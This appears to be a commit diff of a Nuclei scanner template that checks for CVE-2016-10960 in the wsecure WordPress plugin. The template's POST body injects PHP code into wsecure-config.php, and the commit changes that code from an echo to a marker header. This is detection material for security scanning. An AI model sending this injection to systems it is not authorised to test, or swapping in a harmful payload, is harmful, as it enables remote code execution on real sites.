Update CVE-2016-10960.yaml
parent
429bb01311
commit
eaba7dc5de
|
@ -15,14 +15,15 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
|
||||
body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'
|
||||
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Hello, world CVE-2016-10960."
|
||||
- "Nuclei: CVE-2016-10960"
|
||||
condition: and
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue